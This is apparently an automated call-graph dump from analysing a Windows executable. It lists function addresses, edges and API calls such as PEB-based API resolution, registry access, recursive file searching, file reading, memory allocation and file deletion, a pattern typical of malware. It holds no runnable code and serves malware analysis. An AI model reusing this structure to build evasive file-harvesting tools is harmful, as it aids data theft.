9168->9170 9171 40813e 9169->9171 9172 405872 4 API calls 9170->9172 9173 405872 4 API calls 9171->9173 9172->9174 9173->9174 9174->9103 9181 404a19 9175->9181 9177 404ba0 9177->9109 9184 4049ff 9178->9184 9180 404a44 9180->9108 9182 4031e5 4 API calls 9181->9182 9183 404a2c RegOpenKeyW 9182->9183 9183->9177 9185 4031e5 4 API calls 9184->9185 9186 404a12 RegCloseKey 9185->9186 9186->9180 9189 408534 9187->9189 9188 4085af 9188->9120 9189->9188 9197 4084ee 9189->9197 9192 4031e5 4 API calls 9191->9192 9193 4084c7 9192->9193 9193->9120 9195 4031e5 4 API calls 9194->9195 9196 4084e7 9195->9196 9196->9119 9198 4031e5 4 API calls 9197->9198 9199 408501 9198->9199 9199->9188 9201 4031e5 4 API calls 9200->9201 9202 408a06 9201->9202 9203 408b21 9202->9203 9204 4031e5 4 API calls 9202->9204 9203->9140 9206 408a32 9204->9206 9205 408b17 9235 403649 9205->9235 9206->9205 9226 403666 9206->9226 9210 4031e5 4 API calls 9212 408a88 9210->9212 9213 4031e5 4 API calls 9212->9213 9218 408b0e 9212->9218 9214 408ac4 9213->9214 9215 405b6f 6 API calls 9214->9215 9216 408aff 9215->9216 9216->9218 9229 408508 9216->9229 9232 40362f 9218->9232 9220 4086e2 9219->9220 9221 408744 9219->9221 9220->9221 9222 405872 GetProcessHeap RtlAllocateHeap GetProcessHeap HeapFree 9220->9222 9221->9140 9222->9220 9224 4031e5 4 API calls 9223->9224 9225 4036b5 9224->9225 9225->9140 9227 4031e5 4 API calls 9226->9227 9228 403679 9227->9228 9228->9210 9228->9218 9230 4031e5 4 API calls 9229->9230 9231 40851b 9230->9231 9231->9218 9233 4031e5 4 API calls 9232->9233 9234 403642 9233->9234 9234->9205 9236 4031e5 4 API calls 9235->9236 9237 40365c 9236->9237 9237->9203 9838 40f252 9839 404bee 6 API calls 9838->9839 9840 40f269 9839->9840 9841 404bee 6 API calls 9840->9841 9852 40f2ff 9840->9852 9842 40f282 9841->9842 9843 404bee 6 API calls 9842->9843 9844 40f290 9843->9844 9855 404c4e 9844->9855 9846 40f2a7 9847 405872 4 API calls 9846->9847 9846->9852 9848 40f2cd 9847->9848 9849 405872 4 API calls 9848->9849 9850 40f2dc 9849->9850 9851 405872 4 API calls 9850->9851 9853 40f2ee 9851->9853 9854 405762 4 API calls 9853->9854 9854->9852 9856 402b7c 2 API calls 9855->9856 9858 404c60 9856->9858 9857 404ca4 9857->9846 9858->9857 9859 4031e5 4 API calls 9858->9859 9860 404c8d 9859->9860 9860->9857 9861 402bab 2 API calls 9860->9861 9861->9857 9862 41045c 9863 4040bb 12 API calls 9862->9863 9864 410477 9863->9864 9865 41060b 9864->9865 9893 407851 9864->9893 9867 41048f 9869 407851 2 API calls 9867->9869 9873 410604 9867->9873 9868 403f9e 5 API calls 9868->9865 9870 4104a9 9869->9870 9875 4105e0 9870->9875 9876 405ae9 6 API calls 9870->9876 9878 41056f 9870->9878 9879 4105eb 9870->9879 9871 402bab 2 API calls 9871->9873 9872 402bab 2 API calls 9874 4105fb 9872->9874 9873->9868 9874->9871 9877 402bab 2 API calls 9875->9877 9875->9879 9876->9870 9877->9879 9878->9875 9880 4105d6 9878->9880 9882 412269 6 API calls 9878->9882 9879->9872 9879->9874 9881 402bab 2 API calls 9880->9881 9881->9875 9883 410580 9882->9883 9883->9880 9884 405872 4 API calls 9883->9884 9885 410599 9884->9885 9886 405872 4 API calls 9885->9886 9887 4105a9 9886->9887 9888 405872 4 API calls 9887->9888 9889 4105bb 9888->9889 9890 405872 4 API calls 9889->9890 9891 4105cd 9890->9891 9892 402bab 2 API calls 9891->9892 9892->9880 9894 407866 9893->9894 9895 402b7c 2 API calls 9894->9895 9896 407899 9894->9896 9895->9896 9896->9867 9299 40f561 9302 40f4b6 9299->9302 9303 413b28 6 API calls 9302->9303 9308 40f4bf 9303->9308 9304 405b6f 6 API calls 9304->9308 9305 402bab GetProcessHeap HeapFree 9305->9308 9306 413a58 13 API calls 9306->9308 9307 40f559 9308->9304 9308->9305 9308->9306 9308->9307 9312 403b64 9313 4031e5 4 API calls 9312->9313 9314 403b77 PathFileExistsW 9313->9314 9928 40d069 9929 404bee 6 API calls 9928->9929 9930 40d080 9929->9930 9931 404bee 6 API calls 9930->9931 9952 40d1e2 9930->9952 9932 40d099 9931->9932 9933 404bee 6 API calls 9932->9933 9934 40d0a7 9933->9934 9969 404ba7 9934->9969 9937 404bee 6 API calls 9938 40d0c5 9937->9938 9939 404c4e 6 API calls 9938->9939 9940 40d0dc 9939->9940 9941 404bee 6 API calls 9940->9941 9942 40d0eb 9941->9942 9943 404ba7 4 API calls 9942->9943 9944 40d0fa 9943->9944 9945 404bee 6 API calls 9944->9945 9946 40d109 9945->9946 9947 404c4e 6 API calls 9946->9947 9948 40d123 9947->9948 9949 405872 4 API calls 9948->9949 9948->9952 9950 40d14a 9949->9950 9951 405872 4 API calls 9950->9951 9953 40d159 9951->9953 9954 405872 4 API calls 9953->9954 9955 40d16b 9954->9955 9956 405781 4 API calls 9955->9956 9957 40d179 9956->9957 9958 405872 4 API calls 9957->9958 9959 40d18b 9958->9959 9960 405762 4 API calls 9959->9960 9961 40d19f 9960->9961 9962 405872 4 API calls 9961->9962 9963 40d1b1 9962->9963 9964 405781 4 API calls 9963->9964 9965 40d1bf 9964->9965 9966 405872 4 API calls 9965->9966 9967 40d1d1 9966->9967 9968 405762 4 API calls 9967->9968 9968->9952 9970 4031e5 4 API calls 9969->9970 9971 404bca 9970->9971 9971->9937 9341 40f16e 9342 4056bf 2 API calls 9341->9342 9343 40f17b 9342->9343 9344 412093 20 API calls 9343->9344 9345 40f19e 9344->9345 9346 412093 20 API calls 9345->9346 9347 40f1b6 9346->9347 9348 412093 20 API calls 9347->9348 9349 40f1cc 9348->9349 9350 412093 20 API calls 9349->9350 9351 40f1e2 9350->9351 9352 413aca 4 API calls 9351->9352 9353 40f1ef 9352->9353 9354 405695 2 API calls 9353->9354 9355 40f1fa 9354->9355 9356 40ce71 9357 413b28 6 API calls 9356->9357 9358 40ce78 9357->9358 9359 405b6f 6 API calls 9358->9359 9363 40ce83 9359->9363 9360 40cec1 9361 403fbf 7 API calls 9360->9361 9362 40cecc 9361->9362 9365 40cefb 9362->9365 9368 403d74 19 API calls 9362->9368 9363->9360 9364 40ceba 9363->9364 9366 403d74 19 API calls 9363->9366 9367 402bab 2 API calls 9364->9367 9370 40cead 9366->9370 9367->9360 9369 40cee7 9368->9369 9371 40cef4 9369->9371 9372 402bab 2 API calls 9369->9372 9370->9364 9374 402bab 2 API calls 9370->9374 9373 402bab 2 API calls 9371->9373 9372->9371 9373->9365 9374->9364 9375 406472 9376 4031e5 4 API calls 9375->9376 9377 406484 Sleep 9376->9377 10045 40f204 10046 405781 4 API calls 10045->10046 10047 40f214 10046->10047 10048 4057df 13 API calls 10047->10048 10049 40f226 10048->10049 9435 403c08 9436 4031e5 4 API calls 9435->9436 9437 403c1a DeleteFileW 9436->9437 9438 410a09 9439 41219c 14 API calls 9438->9439 9440 410a1b 9439->9440 9441 41219c 14 API calls 9440->9441 9442 410a23 9441->9442 9443 41219c 14 API calls 9442->9443 9444 410a2c 9443->9444 9445 41219c 14 API calls 9444->9445 9446 410a38 9445->9446 9447 404b22 6 API calls 9446->9447 9448 410a4c 9447->9448 9449 410a7a 9448->9449 9450 403fbf 7 API calls 9448->9450 9451 410a5c 9450->9451 9452 410a71 9451->9452 9453 413a58 13 API calls 9451->9453 9454 402bab 2 API calls 9452->9454 9455 410a6b 9453->9455 9454->9449 9456 402bab 2 API calls 9455->9456 9456->9452 10050 410d09 10051 410d56 10050->10051 10052 410d17 10050->10052 10054 413a58 13 API calls 10051->10054 10066 406642 10052->10066 10056 410d6f 10054->10056 10057 4056bf 2 API calls 10058 410d2e 10057->10058 10079 405641 10058->10079 10060 410d41 10061 413aca 4 API calls 10060->10061 10062 410d4a 10061->10062 10063 405695 2 API calls 10062->10063 10064 410d50 10063->10064 10065 4036a3 4 API calls 10064->10065 10065->10051 10067 406662 10066->10067 10068 4031e5 4 API calls 10067->10068 10069 406676 10068->10069 10083 4066bf 10069->10083 10074 4066b1 10076 4036a3 4 API calls 10074->10076 10075 4066a7 10077 4036a3 4 API calls 10075->10077 10078 4066ac 10076->10078 10077->10078 10078->10051 10078->10057 10080 405673 10079->10080 10081 40564d 10079->10081 10080->10060 10081->10080 10082 4056fc 4 API calls 10081->10082 10082->10080 10084 4031e5 4 API calls 10083->10084 10085 4066dc 10084->10085 10086 4066f6 SetLastError 10085->10086 10087 406708 GetLastError 10085->10087 10098 406693 10086->10098 10088 406713 10087->10088 10087->10098 10089 4031e5 4 API calls 10088->10089 10090 406725 10089->10090 10091 4031e5 4 API calls 10090->10091 10090->10098 10092 40673f 10091->10092 10093 406753 10092->10093 10094 406749 10092->10094 10095 4031e5 4 API calls 10093->10095 10096 4036a3 4 API calls 10094->10096 10097 406761 10095->10097 10096->10098 10099 40678a 10097->10099 10100 40677c 10097->10100 10105 406455 10098->10105 10102 4036a3 4 API calls 10099->10102 10101 4036a3 4 API calls 10100->10101 10103 406781 10101->10103 10102->10098 10104 4036a3 4 API calls 10103->10104 10104->10098 10106 4031e5 4 API calls 10105->10106 10107 406468 10106->10107 10107->10074 10107->10075 9457 40c509 9458 412093 20 API calls 9457->9458 9459 40c51e 9458->9459 9466 40910d 9467 404b22 6 API calls 9466->9467 9468 409124 9467->9468 9469 40917a 9468->9469 9470 405b6f 6 API calls 9468->9470 9471 40913e 9470->9471 9473 404b22 6 API calls 9471->9473 9479 409173 9471->9479 9472 402bab 2 API calls 9472->9469 9474 409153 9473->9474 9475 40916a 9474->9475 9476 409408 15 API calls 9474->9476 9477 402bab 2 API calls 9475->9477 9478 409164 9476->9478 9477->9479 9480 402bab 2 API calls 9478->9480 9479->9472 9480->9475 9484 410410 9485 4056bf 2 API calls 9484->9485 9486 41041b 9485->9486 9487 412093 20 API calls 9486->9487 9488 41043c 9487->9488 9489 413aca 4 API calls 9488->9489 9490 410449 9489->9490 9491 405695 2 API calls 9490->9491 9492 410454 9491->9492 9519 40c71a 9520 41219c 14 API calls 9519->9520 9521 40c728 9520->9521 10163 410b1a 10164 404bee 6 API calls 10163->10164 10165 410b31 10164->10165 10166 404bee 6 API calls 10165->10166 10192 410c6d 10165->10192 10167 410b5a 10166->10167 10168 404bee 6 API calls 10167->10168 10169 410b69 10168->10169 10170 404bee 6 API calls 10169->10170 10171 410b78 10170->10171 10172 404ba7 4 API calls 10171->10172 10173 410b86 10172->10173 10174 404ba7 4 API calls 10173->10174 10175 410b95 10174->10175 10176 405872 4 API calls 10175->10176 10175->10192 10177 410bd7 10176->10177 10178 405872 4 API calls 10177->10178 10179 410be8 10178->10179 10180 405872 4 API calls 10179->10180 10181 410bf9 10180->10181 10182 405781 4 API calls 10181->10182 10183 410c07 10182->10183 10184 405781 4 API calls 10183->10184 10188 410c15 10184->10188 10185 410c4e 10186 405762 4 API calls 10185->10186 10187 410c60 10186->10187 10190 403f9e 5 API calls 10187->10190 10187->10192 10188->10185 10196 405e5a 10188->10196 10190->10192 10193 4040bb 12 API calls 10194 410c44 10193->10194 10195 402bab 2 API calls 10194->10195 10195->10185 10197 402b7c 2 API calls 10196->10197 10198 405e72 10197->10198 10199 405ea3 10198->10199 10200 4031e5 4 API calls 10198->10200 10199->10185 10199->10193 10201 405e94 10200->10201 10201->10199 10202 402bab 2 API calls 10201->10202 10202->10199 10203 40f81c 10204 404bee 6 API calls 10203->10204 10205 40f833 10204->10205 10206 404bee 6 API calls 10205->10206 10220 40f94f 10205->10220 10207 40f85c 10206->10207 10208 404bee 6 API calls 10207->10208 10209 40f86b 10208->10209 10210 404bee 6 API calls 10209->10210 10211 40f87a 10210->10211 10212 404bee 6 API calls 10211->10212 10213 40f888 10212->10213 10214 404ba7 4 API calls 10213->10214 10215 40f897 10214->10215 10216 405872 4 API calls 10215->10216 10215->10220 10217 40f8d8 10216->10217 10218 405872 4 API calls 10217->10218 10219 40f8ea 10218->10219 10221 405872 4 API calls 10219->10221 10222 40f8fa 10221->10222 10223 405872 4 API calls 10222->10223 10224 40f90c 10223->10224 10225 405781 4 API calls 10224->10225 10226 40f91d 10225->10226 10227 4040bb 12 API calls 10226->10227 10228 40f92d 10227->10228 10229 405762 4 API calls 10228->10229 10230 40f93f 10229->10230 10230->10220 10231 403f9e 5 API calls 10230->10231 10231->10220 9534 402c1f 9535 4031e5 4 API calls 9534->9535 9536 402c31 LoadLibraryW 9535->9536 10241 407e1f 10242 407e2c 10241->10242 10249 407e61 10241->10249 10244 407e3e 10242->10244 10247 402bab 2 API calls 10242->10247 10250 407e51 10242->10250 10243 407ea6 10245 407eb6 10243->10245 10248 402bab 2 API calls 10243->10248 10246 407ed4 10244->10246 10251 402bab 2 API calls 10244->10251 10245->10250 10252 402bab 2 API calls 10245->10252 10247->10244 10248->10245 10249->10243 10249->10245 10253 405872 4 API calls 10249->10253 10250->10246 10254 402bab 2 API calls 10250->10254 10251->10250 10252->10250 10255 407e86 10253->10255 10254->10246 10256 405872 4 API calls 10255->10256 10257 407e96 10256->10257 10258 405872 4 API calls 10257->10258 10258->10243 9549 405924 9550 4031e5 4 API calls 9549->9550 9551 405937 StrStrW 9550->9551 10267 410927 10268 4044ee 7 API calls 10267->10268 10269 41093d 10268->10269 10270 4056bf 2 API calls 10269->10270 10281 4109a4 10269->10281 10273 410954 10270->10273 10271 4044ee 7 API calls 10271->10273 10273->10271 10274 402bab 2 API calls 10273->10274 10275 410990 10273->10275 10282 41080e 10273->10282 10274->10273 10276 413aca 4 API calls 10275->10276 10277 410998 10276->10277 10278 405695 2 API calls 10277->10278 10279 41099e 10278->10279 10280 402bab 2 API calls 10279->10280 10280->10281 10283 410821 10282->10283 10293 41091f 10283->10293 10294 410701 10283->10294 10286 405872 4 API calls 10287 410900 10286->10287 10288 405872 4 API calls 10287->10288 10289 41090d 10288->10289 10290 405872 4 API calls 10289->10290 10291 410919 10290->10291 10292 402bab 2 API calls 10291->10292 10292->10293 10293->10273 10295 405f08 4 API calls 10294->10295 10297 410713 10295->10297 10296 410804 10296->10286 10296->10293 10297->10296 10298 402b7c 2 API calls 10297->10298 10299 410748 10298->10299 10301 402b7c 2 API calls 10299->10301 10303 4107fd 10299->10303 10300 402bab 2 API calls 10300->10296 10304 4107ad 10301->10304 10302 402bab 2 API calls 10302->10303 10303->10300 10304->10302 10305 40d726 10306 404bee 6 API calls 10305->10306 10307 40d73f 10306->10307 10308 40db63 10307->10308 10309 405872 4 API calls 10307->10309 10312 40d761 10309->10312 10310 404bee 6 API calls 10310->10312 10311 405872 4 API calls 10311->10312 10312->10310 10312->10311 10314 40d971 10312->10314 10313 404ba7 4 API calls 10313->10314 10314->10313 10315 405781 4 API calls 10314->10315 10319 40d9bb 10314->10319 10315->10314 10316 404c4e 6 API calls 10316->10319 10317 405781 4 API calls 10317->10319 10318 4037be 4 API calls 10318->10319 10319->10308 10319->10316 10319->10317 10319->10318 10320 405872 4 API calls 10319->10320 10320->10319 9607 40f12f 9608 41219c 14 API calls 9607->9608 9609 40f13f 9608->9609 9610 41219c 14 API calls 9609->9610 9611 40f14c 9610->9611 9612 41219c 14 API calls 9611->9612 9613 40f159 9612->9613 9614 41219c 14 API calls 9613->9614 9615 40f166 9614->9615 9622 40ed35 9623 4056bf 2 API calls 9622->9623 9624 40ed42 9623->9624 9625 412093 20 API calls 9624->9625 9626 40ed63 9625->9626 9627 412093 20 API calls 9626->9627 9628 40ed73 9627->9628 9629 413aca 4 API calls 9628->9629 9630 40ed80 9629->9630 9631 405695 2 API calls 9630->9631 9632 40ed8e 9631->9632 8076 40f3c5 8081 41219c 8076->8081 8079 41219c 14 API calls 8080 40f3e1 8079->8080 8082 4121b1 8081->8082 8097 40f3d3 8081->8097 8083 4121be 8082->8083 8087 4121c5 8082->8087 8129 413ba4 8083->8129 8085 4121ca 8099 404056 8085->8099 8087->8085 8091 412210 8087->8091 8088 4121c3 8088->8097 8106 405b6f 8088->8106 8091->8097 8134 403fbf 8091->8134 8092 41224d 8094 402bab 2 API calls 8092->8094 8092->8097 8094->8097 8097->8079 8145 402b7c GetProcessHeap RtlAllocateHeap 8099->8145 8101 404066 8103 404095 8101->8103 8147 4031e5 8101->8147 8103->8088 8105 402bab 2 API calls 8105->8103 8107 405b7d 8106->8107 8108 402b7c 2 API calls 8107->8108 8109 405b99 8108->8109 8110 405c02 8109->8110 8183 4059b8 8109->8183 8110->8092 8119 413a58 8110->8119 8112 405c09 8114 402bab 2 API calls 8112->8114 8113 405bba 8113->8112 8115 402b7c 2 API calls 8113->8115 8114->8110 8116 405bdd 8115->8116 8116->8112 8117 405be4 8116->8117 8118 402bab 2 API calls 8117->8118 8118->8110 8120 413a63 8119->8120 8128 412245 8119->8128 8120->8128 8186 405781 8120->8186 8123 405781 4 API calls 8124 413aa0 8123->8124 8189 4057df 8124->8189 8127 405781 4 API calls 8127->8128 8142 402bab 8128->8142 8130 413bad 8129->8130 8131 404056 6 API calls 8130->8131 8133 413bb8 8130->8133 8132 413bc5 8131->8132 8132->8088 8133->8088 8135 402b7c 2 API calls 8134->8135 8137 403fcf 8135->8137 8136 403ff4 8136->8088 8137->8136 8308 403b98 8137->8308 8140 403ff8 GetLastError 8141 402bab 2 API calls 8140->8141 8141->8136 8143 402bb4 GetProcessHeap HeapFree 8142->8143 8144 402bc6 8142->8144 8143->8144 8144->8092 8146 402b98 8145->8146 8146->8101 8148 4031f3 8147->8148 8149 403236 8147->8149 8148->8149 8152 403208 8148->8152 8158 4030a5 8149->8158 8151 403224 8154 403258 8151->8154 8156 4031e5 4 API calls 8151->8156 8164 403263 8152->8164 8154->8103 8154->8105 8155 40320d 8155->8154 8157 4030a5 4 API calls 8155->8157 8156->8154 8157->8151 8170 402ca4 8158->8170 8160 4030b0 8161 4030b5 8160->8161 8174 4030c4 8160->8174 8161->8151 8165 40326d 8164->8165 8166 402b7c 2 API calls 8165->8166 8169 4032b7 8165->8169 8167 40328c 8166->8167 8168 402b7c 2 API calls 8167->8168 8168->8169 8169->8155 8171 403079 8170->8171 8173 40307c 8171->8173 8178 40317b GetPEB 8171->8178 8173->8160 8177 4030eb 8174->8177 8175 4030c0 8175->8151 8177->8175 8180 402c03 8177->8180 8179 40319b 8178->8179 8179->8173 8181 4031e5 3 API calls 8180->8181 8182 402c15 GetProcAddress 8181->8182 8182->8175 8184 4031e5 4 API calls 8183->8184 8185 4059cb 8184->8185 8185->8113 8204 405797 8186->8204 8188 405792 8188->8123 8190 405832 8189->8190 8191 4057eb 8189->8191 8190->8127 8190->8128 8191->8190 8214 4040bb 8191->8214 8194 405839 8196 405853 8194->8196 8241 405627 8194->8241 8195 40582c 8238 403f9e 8195->8238 8252 405762 8196->8252 8203 403f9e 5 API calls 8203->8190 8205 4057a1 8204->8205 8206 4057bd 8204->8206 8205->8206 8208 4056fc 8205->8208 8206->8188 8209 405714 8208->8209 8210 402b7c 2 API calls 8209->8210 8211 405730 8210->8211 8212 402bab 2 API calls 8211->8212 8213 405752 8211->8213 8212->8213 8213->8206 8215 4031e5 4 API calls 8214->8215 8216 4040d5 CreateFileW 8215->8216 8217 4040f8 8216->8217 8218 40418d 8216->8218 8219 4031e5 4 API calls 8217->8219 8220 404183 8218->8220 8258 403c90 8218->8258 8226 404105 8219->8226 8220->8190 8220->8194 8220->8195 8224 40416d 8255 403c40 8224->8255 8226->8224 8230 4031e5 4 API calls 8226->8230 8228 4040bb 9 API calls 8231 4041c8 8228->8231 8229 402bab 2 API calls 8229->8220 8232 404131 VirtualAlloc 8230->8232 8231->8229 8232->8224 8233 404142 8232->8233 8234 4031e5 4 API calls 8233->8234 8235 40414f ReadFile 8234->8235 8235->8224 8236 404160 8235->8236 8237 4031e5 4 API calls 8236->8237 8237->8224 8239 4031e5 4 API calls 8238->8239 8240 403fb1 VirtualFree 8239->8240 8240->8190 8242 4031e5 4 API calls 8241->8242 8243 40563a 8242->8243 8244 405872 8243->8244 8246 405881 8244->8246 8245 4058bc 8247 405797 4 API calls 8245->8247 8249 4058af 8245->8249 8246->8245 8305 4058d4 8246->8305 8247->8249 8249->8196 8251 405781 4 API calls 8251->8245 8253 405781 4 API calls 8252->8253 8254 405770 8253->8254 8254->8203 8256 4031e5 4 API calls 8255->8256 8257 403c52 CloseHandle 8256->8257 8257->8220 8259 403ca3 8258->8259 8262 403caa 8258->8262 8285 405dc5 8259->8285 8261 404056 6 API calls 8263 403cbe 8261->8263 8262->8261 8264 403d3a 8262->8264 8265 403d2e 8263->8265 8266 403d17 8263->8266 8267 403ccf 8263->8267 8264->8220 8281 403c59 8264->8281 8265->8264 8269 402bab 2 API calls 8265->8269 8270 405b6f 6 API calls 8266->8270 8268 405b6f 6 API calls 8267->8268 8272 403cdd 8268->8272 8269->8264 8271 403d14 8270->8271 8274 402bab 2 API calls 8271->8274 8273 405b6f 6 API calls 8272->8273 8275 403cee 8273->8275 8274->8265 8275->8271 8290 403d4d 8275->8290 8278 403d0b 8280 402bab 2 API calls 8278->8280 8280->8271 8282 403c21 8281->8282 8283 4031e5 4 API calls 8282->8283 8284 403c33 8283->8284 8284->8228 8284->8231 8299 406799 8285->8299 8287 405dd5 8288 402b7c 2 API calls 8287->8288 8289 405dfe 8288->8289 8289->8262 8302 403bb7 8290->8302 8292 403cfe 8292->8278 8293 403c62 8292->8293 8294 403d4d 5 API calls 8293->8294 8295 403c6d 8294->8295 8296 403c72 8295->8296 8297 4031e5 4 API calls 8295->8297 8296->8278 8298 403c87 CreateDirectoryW 8297->8298 8298->8278 8300 4031e5 4 API calls 8299->8300 8301 4067ad 8300->8301 8301->8287 8303 4031e5 4 API calls 8302->8303 8304 403bc9 GetFileAttributesW 8303->8304 8304->8292 8306 405797 4 API calls 8305->8306 8307 4058a8 8306->8307 8307->8249 8307->8251 8309 4031e5 4 API calls 8308->8309 8310 403baa 8309->8310 8310->8136 8310->8140 9747 40ebc6 9748 4040bb 12 API calls 9747->9748 9749 40ebdf 9748->9749 9750 40ecd7 9749->9750 9767 407795 9749->9767 9753 40eccd 9754 403f9e 5 API calls 9753->9754 9754->9750 9755 4056bf 2 API calls 9765 40ec12 9755->9765 9756 40ecb5 9757 402bab 2 API calls 9756->9757 9758 40ecbd 9757->9758 9759 413aca 4 API calls 9758->9759 9760 40ecc7 9759->9760 9761 405695 2 API calls 9760->9761 9761->9753 9762 407908 GetProcessHeap RtlAllocateHeap 9762->9765 9764 405872 GetProcessHeap RtlAllocateHeap GetProcessHeap HeapFree 9764->9765 9765->9756 9765->9762 9765->9764 9766 402bab GetProcessHeap HeapFree 9765->9766 9778 412269 9765->9778 9766->9765 9768 4077ab 9767->9768 9774 4077b3 9768->9774 9785 405ae9 9768->9785 9770 4077e1 9771 4077f8 9770->9771 9773 407802 9770->9773 9770->9774 9772 402bab 2 API calls 9771->9772 9772->9774 9775 402b7c 2 API calls 9773->9775 9774->9753 9774->9755 9776 407811 9775->9776 9777 402bab 2 API calls 9776->9777 9777->9774 9801 40374e 9778->9801 9783 402bab 2 API calls 9784 412299 9783->9784 9784->9765 9786 405af7 9785->9786 9787 402b7c 2 API calls 9786->9787 9788 405b03 9787->9788 9797 405b5a 9788->9797 9798 405998 9788->9798 9790 405b21 9791 405b61 9790->9791 9793 402b7c 2 API calls 9790->9793 9792 402bab 2 API calls 9791->9792 9792->9797 9794 405b39 9793->9794 9794->9791 9795 405b40 9794->9795 9796 402bab 2 API calls 9795->9796 9796->9797 9797->9770 9799 4031e5 4 API calls 9798->9799 9800 4059ab 9799->9800 9800->9790 9802 402b7c 2 API calls 9801->9802 9804 40375f 9802->9804 9803 4037a3 9803->9784 9808 4037be 9803->9808 9804->9803 9805 4031e5 4 API calls 9804->9805 9806 40378f 9805->9806 9806->9803 9807 402bab 2 API calls 9806->9807 9807->9803 9809 4031e5 4 API calls 9808->9809 9810 4037e2 9809->9810 9811 40382b 9810->9811 9812 402b7c 2 API calls 9810->9812 9811->9783 9813 403802 9812->9813 9814 403832 9813->9814 9816 403809 9813->9816 9815 4036a3 4 API calls 9814->9815 9815->9811 9817 4036a3 4 API calls 9816->9817 9817->9811 8908 410cd1 8913 412093 8908->8913 8911 412093 20 API calls 8912 410cff 8911->8912 8915 4120a5 8913->8915 8934 410cf1 8913->8934 8914 4120b3 8916 404056 6 API calls 8914->8916 8915->8914 8920 412100 8915->8920 8917 4120ba 8916->8917 8918 405b6f 6 API calls 8917->8918 8919 412152 8917->8919 8917->8934 8922 412125 8918->8922 8935 403d74 8919->8935 8921 403fbf 7 API calls 8920->8921 8920->8934 8921->8917 8922->8919 8926 412139 8922->8926 8927 41214d 8922->8927 8925 41218c 8929 402bab 2 API calls 8925->8929 8925->8934 8931 402bab 2 API calls 8926->8931 8930 402bab 2 API calls 8927->8930 8928 402bab 2 API calls 8928->8925 8929->8934 8930->8919 8932 41213e 8931->8932 8933 402bab 2 API calls 8932->8933 8933->8934 8934->8911 8936 403d87 8935->8936 8937 403ea3 8936->8937 8938 405b6f 6 API calls 8936->8938 8939 405b6f 6 API calls 8937->8939 8940 403da3 8938->8940 8941 403eb9 8939->8941 8940->8937 8943 4031e5 4 API calls 8940->8943 8942 4031e5 4 API calls 8941->8942 8949 403f6f 8941->8949 8944 403ed3 FindFirstFileW 8942->8944 8945 403dbc FindFirstFileW 8943->8945 8961 403f8d 8944->8961 8965 403ee8 8944->8965 8956 403e9c 8945->8956 8966 403dd1 8945->8966 8946 402bab 2 API calls 8946->8949 8947 402bab 2 API calls 8947->8937 8948 4031e5 4 API calls 8950 403e84 FindNextFileW 8948->8950 8949->8925 8949->8928 8951 403e96 8950->8951 8950->8966 8975 403bef 8951->8975 8952 4031e5 4 API calls 8955 403f50 FindNextFileW 8952->8955 8954 405b6f 6 API calls 8954->8965 8958 403f87 8955->8958 8955->8965 8956->8947 8957 405b6f 6 API calls 8957->8966 8959 403bef 5 API calls 8958->8959 8959->8961 8960 403f75 8962 402bab 2 API calls 8960->8962 8961->8946 8964 403f7b 8962->8964 8963 403d74 15 API calls 8963->8966 8968 403bef 5 API calls 8964->8968 8965->8952 8965->8954 8965->8960 8969 402bab 2 API calls 8965->8969 8978 40fa23 8965->8978 8966->8948 8966->8957 8966->8963 8967 402bab 2 API calls 8966->8967 8970 403f63 8966->8970 8967->8966 8968->8949 8969->8965 8971 402bab 2 API calls 8970->8971 8972 403f69 8971->8972 8973 403bef 5 API calls 8972->8973 8973->8949 8976 4031e5 4 API calls 8975->8976 8977 403c01 FindClose 8976->8977 8977->8956 8979 40fa39 8978->8979 8980 410293 8979->8980 8981 405b6f 6 API calls 8979->8981 8980->8965 8982 40ffcc 8981->8982 8982->8980 8983 4040bb 12 API calls 8982->8983 8984 40ffeb 8983->8984 8985 41028c 8984->8985 8987 402b7c 2 API calls 8984->8987 9033 41027d 8984->9033 8986 402bab 2 API calls 8985->8986 8986->8980 8989 41001e 8987->8989 8988 403f9e 5 API calls 8988->8985 8990 40a423 4 API calls 8989->8990 8989->9033 8991 41004a 8990->8991 8992 4031e5 4 API calls 8991->8992 8993 41005c 8992->8993 8994 4031e5 4 API calls 8993->8994 8995 410079 8994->8995 8996 4031e5 4 API calls 8995->8996 8997 410096 8996->8997 8998 4031e5 4 API calls 8997->8998 8999 4100b0 8998->8999 9000 4031e5 4 API calls 8999->9000 9001 4100cd 9000->9001 9002 4031e5 4 API calls 9001->9002 9003 4100ea 9002->9003 9034 412516 9003->9034 9005 4100fd 9006 40642c 5 API calls 9005->9006 9007 41013e 9006->9007 9008 410142 9007->9008 9009 41019f 9007->9009 9010 40488c 5 API calls 9008->9010 9012 4031e5 4 API calls 9009->9012 9011 410151 9010->9011 9013 41019c 9011->9013 9014 404866 4 API calls 9011->9014 9027 4101bb 9012->9027 9015 40642c 5 API calls 9013->9015 9017 41022a 9013->9017 9016 410163 9014->9016 9018 410201 9015->9018 9019 406c4c 6 API calls 9016->9019 9031 41018e 9016->9031 9020 413a58 13 API calls 9017->9020 9022 410205 9018->9022 9023 41022f 9018->9023 9024 410178 9019->9024 9030 41026e 9020->9030 9021 403c40 5 API calls 9021->9013 9025 4126a7 7 API calls 9022->9025 9037 4125db 9023->9037 9029 406c4c 6 API calls 9024->9029 9025->9017 9028 4031e5 4 API calls 9027->9028 9028->9013 9029->9031 9032 402bab 2 API calls 9030->9032 9031->9021 9032->9033 9033->8988 9035 4031e5 4 API calls 9034->9035 9036 412539 9035->9036 9036->9005 9038 40488c 5 API calls 9037->9038 9039 4125ec 9038->9039 9040 41269f 9039->9040 9041 4031e5 4 API calls 9039->9041 9040->9017 9042 412609 9041->9042 9043 4031e5 4 API calls 9042->9043 9049 41268f 9042->9049 9045 41262a 9043->9045 9044 403c40 5 API calls 9044->9040 9046 412675 9045->9046 9054 4124f1 9045->9054 9047 4031e5 4 API calls 9046->9047 9047->9049 9049->9044 9051 412663 9053 4031e5 4 API calls 9051->9053 9052 4124f1 4 API calls 9052->9051 9053->9046 9055 4031e5 4 API calls 9054->9055 9056 412503 9055->9056 9056->9051 9056->9052 9243 4049dc 9244 4031e5 4 API calls 9243->9244 9245 4049ef 9244->9245 9900 40cddd 9901 405b6f 6 API calls 9900->9901 9902 40cdee 9901->9902 9903 40ce06 9902->9903 9904 413a58 13 API calls 9902->9904 9906 405b6f 6 API calls 9903->9906 9912 40ce59 9903->9912 9905 40ce00 9904->9905 9907 402bab 2 API calls 9905->9907 9908 40ce1c 9906->9908 9907->9903 9909 40ce52 9908->9909 9911 403d74 19 API calls 9908->9911 9908->9912 9910 402bab 2 API calls 9909->9910 9910->9912 9913 40ce45 9911->9913 9913->9909 9914 402bab 2 API calls 9913->9914 